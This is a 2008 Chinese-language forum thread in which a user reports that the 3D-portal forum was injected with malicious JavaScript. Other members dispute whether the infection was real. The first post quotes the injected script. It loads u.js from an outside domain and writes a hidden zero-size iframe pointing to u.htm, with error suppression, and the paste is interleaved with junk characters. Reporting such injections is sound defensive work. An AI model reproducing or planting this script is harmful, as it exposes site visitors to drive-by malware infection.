此网被挂马

czy12 · 发表于 2008-11-26 14:38:57

马上注册，结识高手，享用更多资源，轻松玩转三维网社区。

您需要登录才可以下载或查看，没有帐号？注册

x

马:Hack.Exploit.Script.JS.Mixed.c

<script language="javascript" SRC=" ' target=_blank>http://u.cruze3.cn/u.js"></script> c a* N! g$ H: q( ~/ I+ y4 D
/ n* }7 |9 o2 L! o% z
document.writeln("<script>";! W8 P* f+ o+ p" p
document.writeln("function oK_Begin(){";
2 }) g' C% ]/ ?) K$ R- {/ c2 y
document.writeln("var Then = new Date() ";" A5 @& w9 X$ j- {5 \" J
document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)";
) D* N4 Z! W" A& E% ?: X c
document.writeln("var cookieString = new String(document.cookie)";: h. U. _, _2 |% S3 J
document.writeln("var cookieHeader = "Cookie1=" ";
0 O: o- @( A) K4 a I' |% P- v* |
document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)";
/ @; J4 `$ k+ h1 H
document.writeln("if (beginPosition != -1){ ";
0 a* w0 R- \. M" w+ @
document.writeln("} else ";( I6 D+ v- ]# C) ?
document.writeln("{ document.cookie = "Cookie1=POPWINDOS;expires="+ Then.toGMTString() ";
2 f$ l4 \+ g: e/ j
document.writeln("document.write(\'<iframe width=0 height=0 src="\'">http://u.cruze3.cn/u.htm"><\/iframe>\');";8 ?' h) u( B+ g; h9 I! ~
document.writeln("}";) e: p' h: I+ I! M2 B- k
document.writeln("}";0 Z/ g2 T: b3 k
document.writeln("oK_Begin();";
; y- A6 B8 ]0 M
document.writeln("<\/script>";; A/ P% j4 w- C
document.writeln("<script>window.onerror=function(){return true;}<\/script>". z$ J3 w: U4 [6 _0 ~/ H) ^3 d9 K3 i
- [3 j+ v/ l& Z7 W
4 Q+ w) D) S; r( l$ b3 Z
" N0 Q; a& b8 t: e
: l' o: ^; r) K8 Y1 O% W
) j! y9 ?0 ]5 W0 ~: H/ V7 {# b: v) \0 a

复制代码

虽然从表面上去看是个恶意代码,但里面可能包含马,试图打开此网页u.htm,而此网页可能是网页木马

19720205 · 发表于 2008-11-26 14:44:03

请管理员确认是否网页挂马?

cayuer · 发表于 2008-11-26 14:47:52

我的麦咖啡都没检测出来你什么杀毒软件？

czy12 · 发表于 2008-11-26 16:16:23

不是杀软件查的.
只是无意中去看了源文件,感觉网头中的u.js很是反常(按常理说,很少在HEAD前,且根目录并是是此网站,于是,下载了u.js,发现不对头.它试图以最小化打开U.HTM网页,按平时的经验,它不是毒就是马,很少有人会在论坛上放毒,一般多是放马.
不过,已经被清理了.

HEHE只是没有礼貌

[ 本帖最后由 czy12 于 2008-11-26 16:25 编辑 ]

江南有雪 · 发表于 2008-11-26 18:27:17

你这个什么网站，哪里出来的？

ht tp://u.cruze3.cn/u.js

czy12 · 发表于 2008-11-27 09:15:28

http://u.cruze3.cn/u.js
此网是个挂马网,是不可能看到的(他才不会那么笨,HEHE),一般都通过本地IIS进行域名转向.
这是昨天我想看别的网页的源文件时,无意中点了此网页的源文件,才发现不对头.
HEHE

wwqq · 发表于 2008-11-27 10:26:38

这跟三维有什么关系？

czy12 · 发表于 2008-11-27 11:01:02

这是挂在三维网论坛里的.
红线所指

huang_baker · 发表于 2008-11-27 11:21:19

奇怪，为什么我的里面没有？是不是楼主的机器自己带病毒了？

小雪 · 发表于 2008-11-27 11:26:10

自己的机子中毒了，就不要满天喊叫了，没人会认为你是一个杀毒的行家

czy12 · 发表于 2008-11-27 11:34:27

不学无术.
HEHE

yyywwwhk · 发表于 2008-11-27 14:30:45

但在:
http://www.3dportal.cn/discuz/ 之原始檔
似乎看不见楼主所说的 http://u.cruze3.cn/u.js

[ 本帖最后由 yyywwwhk 于 2008-11-27 16:23 编辑 ]

新洁电子 · 发表于 2008-11-27 15:30:58

经过自编扫描代码处理结果，未发现楼主说的挂马代码！

请清理自己计算机的缓冲区！

hebei · 发表于 2008-11-27 15:43:48

提示: 作者被禁止或删除内容自动屏蔽

college · 发表于 2008-11-27 15:47:42

看您的尾符/script，很像是U盘病毒。

czy12 · 发表于 2008-11-27 15:50:50

DZ6.1有代码自我修复功能。甚至可以在服务程序中设置定时还原数据库。
我也说了：已修复。

ps:这与缓存毫无关系。虽然缓存中有U.JS.
但本机上的毒是不会去改动你的网页内容的.我的机子中毒,和你的网页源代码有何相关?

script是个JAVA代码,与U盘何关?

HEHE

[ 本帖最后由 czy12 于 2008-11-27 16:03 编辑 ]

新洁电子 · 发表于 2008-11-27 16:11:40

非也，代码是程序直接采样的当时的网页代码，是自编的，算不上权威，但是可以直接进入部分加密网站！

如果却如你说的修改了，我想，这只有论坛管理员有这个权限，即便是后台也是有记录的。假如确实是论坛后台修改了，一定会给大伙一个说法的。

相反，目前从各方面提供的代码显示，确实“此时此刻”是正常的！至于继续讨论已经无大的价值！

		自动登录	找回密码
密码			注册

通知

此网被挂马

马上注册，结识高手，享用更多资源，轻松玩转三维网社区。

回复 3# cayuer 的帖子

回复 5# 江南有雪的帖子

回复 6# czy12 的帖子

回复 8# czy12 的帖子

浏览过的版块

hebei hebei 当前离线积分 2978 UID 494886 主题在线时间小时注册时间 2008-3-22 头像被屏蔽	发表于 2008-11-27 15:43:48 \| 显示全部楼层来自：中国河北衡水提示: 作者被禁止或删除内容自动屏蔽

	回复支持反对举报

通知

此网被挂马

马上注册，结识高手，享用更多资源，轻松玩转三维网社区。

回复 3# cayuer 的帖子

回复 5# 江南有雪 的帖子

回复 6# czy12 的帖子

回复 8# czy12 的帖子

浏览过的版块

回复 5# 江南有雪的帖子